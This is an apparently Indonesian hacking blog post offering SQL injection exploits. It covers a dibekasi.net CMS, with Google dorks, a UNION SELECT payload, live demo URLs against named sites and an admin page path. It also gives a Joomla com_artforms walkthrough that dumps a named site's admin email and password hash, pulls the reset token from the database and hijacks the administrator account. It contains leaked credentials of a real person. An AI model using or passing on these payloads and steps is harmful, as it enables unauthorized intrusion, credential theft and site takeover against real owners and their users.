Exploit + ADMIN PAGE NEW UPDATE

################################################################################​#
title : powered by dibekasi.net SQLi vulner
author : bumble_be
contact : iogi89@ymail.com
web : bumble-be.us / linggau-haxor.com
################################################################################​########
dork : allinurl: page_info.php?id_brt=
vendor : dibekasi.net


=============exploit===============
+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--
=============Vuln In here===========
http://webtarget.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktgbr=16
=============live Demos============
http://www.butikgaul.com/page_info.php?id_brt=70+AND+1=2+UNION+SELECT+1,2,3,4,5,version%28%29,7,8,9,10,11 ​,12,13,14,? ?15,16–&id_ktgbr=16
greet : devilzc0de.org, indonesianhacker.org, palembanghackerlink.org, hacker-newbie.org, bumble-be.us
Greetz : DC crew :
flyff666,chaer.newbie, petimati, cruz3n,mywisdom, whitehat, gunslinger, ketek, xtr0nic, revtan,t3mp3, el_nino, wahyu_devilzc0de
IH crew :
r3mick, otong, bobyhikaru, Aa , RxN7 , sudden_death, shadowsmaker, Pl4nkt0n, syntax_eRroR, ichito-bandito, system_RTO, cah_surip, cs-31,demnas
###########################################################################



----------------------------------------
POWERED BY: XXHX
contact : xxhxmx.zx@gmail.com
----------------------------------------
Dork:
Code:
inurl:/page_main.php?id_stdpg=
vuln : http://target.com/page_main.php?id_stdpg=


NEW Dork:
Code:
inurl:/page_member_reg.php?id_prop=
vuln : http://target.com/page_member_reg.php?id_prop=

ADMIN PAGE:
Code:
http://target.com/68651519/68530744.php
Note:admin page juga berlaku untuk dibekasi versi terbaru.

DECRYPTER:
Code:
[url]http://hacker-newbie.org/showthread.php?tid=9171[/url]
by Dika_xb

source : http://hacker-newbie.org/showthread.php?tid=8780



Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Joomla Exploit

targetnya
cari di google
pake dork ini

inurl:"option com_artforms"

jangan malas mencari -_- di google :D

kita dapat target yaitu :

http://www.avaclean.com/

di exploid
ni kodenya di paste ke target tadi

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

terus
copy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadi
yaitu

josh@bkmediagroup.com

setelah di enter
anda disuruh masukin code :

kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita :D

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini